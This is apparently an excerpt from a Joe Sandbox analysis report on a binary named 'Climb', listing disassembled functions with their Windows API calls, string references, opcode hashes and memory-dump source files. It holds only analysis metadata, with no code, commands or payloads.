Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: a199074a3a9eb7fef3c50c0e2425cfc651ce4c89cb55c4fcdc2c31ee464db332
Instruction ID: 34f3a336f775bda13896058291e113b3d6b20a7d1232e0ea85f6f9cd62e9f643
Opcode Fuzzy Hash: a199074a3a9eb7fef3c50c0e2425cfc651ce4c89cb55c4fcdc2c31ee464db332
Instruction Fuzzy Hash: D4012B32C01114BBCB106FA6DC05B9B7B28EF67334F10421BF826821E0DB784805C6A5

Function 00487873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004878B1
GetStockObject.GDI32(00000011), ref: 004878C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 004878CF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 45b04a7ae3b8522856c387c84e81980711f0eb1374b5e513cbdd7db8917ca9bc
Instruction ID: c1233067535b36b9bc630486563d12557ec128d03c047839aef8041eb357993c
Opcode Fuzzy Hash: 45b04a7ae3b8522856c387c84e81980711f0eb1374b5e513cbdd7db8917ca9bc
Instruction Fuzzy Hash: E3118B72905148BFDF026F908C68EEA7B69FF183A4F144116FA0052260D739DC60FBA0

Function 004B33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,004B338D,00000364,00000000,00000000,00000000,?,004B35FE,00000006,FlsSetValue), ref: 004B3418
GetLastError.KERNEL32(?,004B338D,00000364,00000000,00000000,00000000,?,004B35FE,00000006,FlsSetValue,00523260,FlsSetValue,00000000,00000364,?,004B31B9), ref: 004B3424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004B338D,00000364,00000000,00000000,00000000,?,004B35FE,00000006,FlsSetValue,00523260,FlsSetValue,00000000), ref: 004B3432

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: fbac4248a4d5223fbc5e2c258f68773d02e2abcc8e99cfcf90a0ada266fdc5de
Instruction ID: fcb95e1189c3c118ad3539dd576914510dbb757f9209d1de50a5e57cb4af77f7
Opcode Fuzzy Hash: fbac4248a4d5223fbc5e2c258f68773d02e2abcc8e99cfcf90a0ada266fdc5de
Instruction Fuzzy Hash: 9101FC36611232ABC7224F7E9C449D77B68BF15B627114621F916D3240CB38DD06C6F8

Function 004EBA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004EB69A,?,00008000), ref: 004EBA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004EB69A,?,00008000), ref: 004EBAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004EB69A,?,00008000), ref: 004EBABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004EB69A,?,00008000), ref: 004EBAED

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 650261c75dee0a4f5762f43986758c0a696049af27cc40b118e0d63e6cfbd48e
Instruction ID: e735385bd132a690fe070054b4a3dd5ea0684709bdfb15bff03e3f34f6a56c4c
Opcode Fuzzy Hash: 650261c75dee0a4f5762f43986758c0a696049af27cc40b118e0d63e6cfbd48e
Instruction Fuzzy Hash: 0D115E31D00559E7CF00EFA6E9496EFBB78FF19712F1040A6D541B2240CB345654DBA9

Function 0051886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0051888E
ScreenToClient.USER32(?,?), ref: 005188A6
ScreenToClient.USER32(?,?), ref: 005188CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 005188E5

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 9685dd5abb6f7e5825b86ec29ce04307672a70d04afe42720dcebf44dec49365
Instruction ID: 89dfccf9207790da7812630933cd68db4bb3a15a41465e0691c27f1f403d80b2
Opcode Fuzzy Hash: 9685dd5abb6f7e5825b86ec29ce04307672a70d04afe42720dcebf44dec49365
Instruction Fuzzy Hash: 421142B9D00209EFDB41DFA8C884AEEBBF5FB18310F508166E915E3210D735AA94DF60

Function 004E36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004E3712
GetWindowThreadProcessId.USER32(?,00000000), ref: 004E3723
GetCurrentThreadId.KERNEL32 ref: 004E372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004E3731

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 28ee972c2f7d67c80e81870cfb5ae5278758570a271efb866a87ae25786a3b0c
Instruction ID: 65bef9ebdd95a73ea9d6ad8968f744a79306a6621298388ec290441f560600fb
Opcode Fuzzy Hash: 28ee972c2f7d67c80e81870cfb5ae5278758570a271efb866a87ae25786a3b0c
Instruction Fuzzy Hash: 82E06DF15012647ADA205BA39C4DEEB7F6CDB62BA2F008016F105D2080DAA98944E2B1

Function 005192BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00481F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00481F87
Part of subcall function 00481F2D: SelectObject.GDI32(?,00000000), ref: 00481F96
Part of subcall function 00481F2D: BeginPath.GDI32(?), ref: 00481FAD
Part of subcall function 00481F2D: SelectObject.GDI32(?,00000000), ref: 00481FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 005192E3
LineTo.GDI32(?,?,?), ref: 005192F0
EndPath.GDI32(?), ref: 00519300
StrokePath.GDI32(?), ref: 0051930E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: a4a46886f44327ea24f3302aa390550c559e146018c030637bebbea704530920
Instruction ID: 16a3b3f613470aebfd74cfaa1b7fb369e840c76b56cc1ea5d7ff1f72280339f0
Opcode Fuzzy Hash: a4a46886f44327ea24f3302aa390550c559e146018c030637bebbea704530920
Instruction Fuzzy Hash: 68F05E32005258BBDB126F54AC0EFCE3F69AF1A321F048001FA11211E1C7B555A6EBE9

Function 004821A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004821BC
SetTextColor.GDI32(?,?), ref: 004821C6
SetBkMode.GDI32(?,00000001), ref: 004821D9
GetStockObject.GDI32(00000005), ref: 004821E1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 3ecf1617f897ead043f156a5720b99db9c0a821fc335956cd0a8393951f5deaf
Instruction ID: 4e9b98babf487477b916a12daff3b82134250d0b6ee1fa52c44ad8c81dea2cec
Opcode Fuzzy Hash: 3ecf1617f897ead043f156a5720b99db9c0a821fc335956cd0a8393951f5deaf
Instruction Fuzzy Hash: 78E06531280640BADB215F74AC09BE93B21AB21336F14C61AF7F6541E0C7764644EB21

Function 004DEC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 004DEC36
GetDC.USER32(00000000), ref: 004DEC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004DEC60
ReleaseDC.USER32(?), ref: 004DEC81

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4bc27cbbcfa2042e267877fc61f8961ff768cc2f4d952a1ad181eb29b9c7314f
Instruction ID: 42069b1b5054653fc130f351e889aa2508153864516fa2756b6694881a62643d
Opcode Fuzzy Hash: 4bc27cbbcfa2042e267877fc61f8961ff768cc2f4d952a1ad181eb29b9c7314f
Instruction Fuzzy Hash: A2E01A74800204DFCF40AFA1C90CAADBBB1EB28310F10C41AE80AE3250D73D5946EF25

Function 004DEC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 004DEC4A
GetDC.USER32(00000000), ref: 004DEC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004DEC60
ReleaseDC.USER32(?), ref: 004DEC81

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 00537dc85ac2bace778497c87810e87b7b065c397ee632eb9ed08b4f9abdb634
Instruction ID: af1b0c15c3774b69922c22e6a2136536b6f3de88dc60a4b955c1a546efa13d55
Opcode Fuzzy Hash: 00537dc85ac2bace778497c87810e87b7b065c397ee632eb9ed08b4f9abdb634
Instruction Fuzzy Hash: 9CE01A74C00204DFCF409FA1C808A9DBBB1AB28310B108419E80AE3250D73D5905EF24

Function 004D3616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

bnN, xrefs: 004D3631, 004D38EA, 004D3903, 004D3B3F, 004D3B58
@COM_EVENTOBJ, xrefs: 004D3AD6

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LoadString
String ID: @COM_EVENTOBJ$bnN
API String ID: 2948472770-3191395843
Opcode ID: e3eb2db1eb4029c572cf7477a38c56ffd1cd834af22416471b049cf7bc90e590
Instruction ID: 360782f4550e63a9b3b8013bfdef893d44edfb088952f7880cedcd7d26ce952c
Opcode Fuzzy Hash: e3eb2db1eb4029c572cf7477a38c56ffd1cd834af22416471b049cf7bc90e590
Instruction Fuzzy Hash: 57F1AD70A082009FD724EF15C891B6AB7E0BF84709F14885FF58A97361D779EA45CB8B

Function 005085DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 004A05B2: EnterCriticalSection.KERNEL32(0055170C,?,00000000,?,0048D22A,00553570,00000001,00000000,?,?,004FF023,?,?,00000000,00000001,?), ref: 004A05BD
Part of subcall function 004A05B2: LeaveCriticalSection.KERNEL32(0055170C,?,0048D22A,00553570,00000001,00000000,?,?,004FF023,?,?,00000000,00000001,?,00000001,00552430), ref: 004A05FA

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 004A0413: __onexit.LIBCMT ref: 004A0419

__Init_thread_footer.LIBCMT ref: 00508658

Part of subcall function 004A0568: EnterCriticalSection.KERNEL32(0055170C,00000000,?,0048D258,00553570,004C27C9,00000001,00000000,?,?,004FF023,?,?,00000000,00000001,?), ref: 004A0572
Part of subcall function 004A0568: LeaveCriticalSection.KERNEL32(0055170C,?,0048D258,00553570,004C27C9,00000001,00000000,?,?,004FF023,?,?,00000000,00000001,?,00000001), ref: 004A05A5

Strings

Variable must be of type 'Object'., xrefs: 00508697
bnN, xrefs: 005085E5, 0050887F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: Variable must be of type 'Object'.$bnN
API String ID: 535116098-3964911946
Opcode ID: d172227612459316817f228f6dd6d767bdf09a20222b0c5369a721dae9c9bb28
Instruction ID: 55afe2898a95229f2d6f62aa8b97d9827b27af0f300e4c7fae5cfb0276bd4850
Opcode Fuzzy Hash: d172227612459316817f228f6dd6d767bdf09a20222b0c5369a721dae9c9bb28
Instruction Fuzzy Hash: 0F917834A00209EFCB04EF95D891DBEBBB1FF48304F54845EE946AB292DB71AE45CB54

Function 004F57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 004841EA: _wcslen.LIBCMT ref: 004841EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 004F5919

Strings

*, xrefs: 004F5855
LPT, xrefs: 004F5840

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 457f4d9dd39f5f149067f7e0fb0d34fbf80150c98429441ddb02a1f3eb4331eb
Instruction ID: 37494aeedcf9078eb5a1d6dc2ff0180497958d7c5d5c42e29eaab40900814dda
Opcode Fuzzy Hash: 457f4d9dd39f5f149067f7e0fb0d34fbf80150c98429441ddb02a1f3eb4331eb
Instruction Fuzzy Hash: 6A917075A00608DFCB14DF54C484EBABBF1AF44308F18809AEA459F352C779EE86CB95

Function 004AE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004AE67D

Strings

pow, xrefs: 004AE655, 004AE672

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c28eb875a878b2cacffd70130ca3607a1a0b6673779f2afaf5092f135a46925c
Instruction ID: 01ec31de0c69dbbd7f96d80ed6ff6e2ba42ff6cb5e53682736dfbcc018a5698f
Opcode Fuzzy Hash: c28eb875a878b2cacffd70130ca3607a1a0b6673779f2afaf5092f135a46925c
Instruction Fuzzy Hash: 56515A61E0A10296C715B719DD013EB3BA8AB72740F604D5FE0A1423A9DF3D8C97EA5E

Function 0049A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0049A916

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: dc429431931540e9d9608e3a403e546483e580fa1a0ce4e3153ef109eb3584b0
Instruction ID: 58abdffd4418d0dae2989fd031ca07deae0dcceab89c6aa9472d04d991246dfd
Opcode Fuzzy Hash: dc429431931540e9d9608e3a403e546483e580fa1a0ce4e3153ef109eb3584b0
Instruction Fuzzy Hash: 955134715042469FCF15EF28C4616BB7BA0AF15314F24845FE8919B390EB3C9D52C7A9

Function 0049F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0049F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 0049F6F4

Strings

@, xrefs: 0049F6E8

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 09b8d4a268d14d87dc8aed809fcf34c85eb8f59ac6d6a16a294dcb13a6bc3552
Instruction ID: 3c02a5fc258ca80da557b9618f4933d09facbf14897a06a97daf8036f8808973
Opcode Fuzzy Hash: 09b8d4a268d14d87dc8aed809fcf34c85eb8f59ac6d6a16a294dcb13a6bc3552
Instruction Fuzzy Hash: DC5148714087489BD320AF11DC86BAFBBE8FF95304F818C5EF1D9511A1EB348569CB6A

Function 00514008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 005140BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005140F8

Strings

static, xrefs: 00514058

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 2ad10000f44390b1656bf0dabf1577fee63723b86a0a24441944d45d00e25a6a
Instruction ID: c7d98df38f121bd4d3cdb2bdcd1d69b93bd46dbaad475ddaa575acc1eeb71114
Opcode Fuzzy Hash: 2ad10000f44390b1656bf0dabf1577fee63723b86a0a24441944d45d00e25a6a
Instruction Fuzzy Hash: FD319071110604AAEB20DF65CC84FFB7BA9FF48724F009A1DF9A987190DA75AC81DB60

Function 00514FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 005150BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005150D2

Strings

', xrefs: 0051502C

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 54bd8864e3b912b6c0edb135b3fbca2520b994bbb5565d2e23c436afdf2d1f34
Instruction ID: c090ba261c6691fbdd91139f5a49f500f6cb3b13b62bb4cbbc32cfdb812d318a
Opcode Fuzzy Hash: 54bd8864e3b912b6c0edb135b3fbca2520b994bbb5565d2e23c436afdf2d1f34
Instruction Fuzzy Hash: 27310874A0170ADFEB14CFA9C894BDA7BB5FF49300F10406AE904AB351E771A985DF90

Function 004820B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

